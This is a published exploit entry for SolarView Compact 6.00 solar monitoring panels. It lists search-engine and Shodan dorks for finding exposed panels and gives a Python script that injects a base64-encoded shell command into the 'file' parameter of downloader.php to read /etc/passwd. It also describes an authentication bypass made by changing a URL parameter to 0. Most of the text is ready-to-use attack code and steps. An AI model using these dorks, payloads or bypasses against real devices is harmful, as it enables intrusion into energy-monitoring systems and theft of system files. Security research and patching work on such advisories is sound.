# Exploit Title: SolarView Compact 6.00 - Command Injection # Date: 2024-03-30 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: SolarView Compact # Version: 6.00 # Tested on: Windows/Linux/Android(termux) Step 1 : Attacker can using these dorks and access to find the panel inurl:"Solar_Menu.php?menu=" Shodan Dork: http.html:"solarview compact" Step 2 : Attacker can use this exploit to get Remote Command Injection import argparse import requests def vuln_check(ip_address, port): url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip" response = requests.get(url) if response.status_code == 200: output = response.text if "root" in output: print("Vulnerability detected: Command Injection possible.") print(f"passwd file content:\n{response.text}") else: print("No vulnerability detected.") else: print("Error: Unable to fetch response.") def main(): parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ") parser.add_argument("-i", "--ip", help="IP address of the target device", required=True) parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int) args = parser.parse_args() ip_address = args.ip port = args.port vuln_check(ip_address, port) if __name__ == "__main__": main() Step 3 : For Bypass Authentication attacker can change menu value to 0 for example http://example.com/Solar_Menu.php?menu=1&app=2 http://example.com/Solar_Menu.php?menu=0&app=2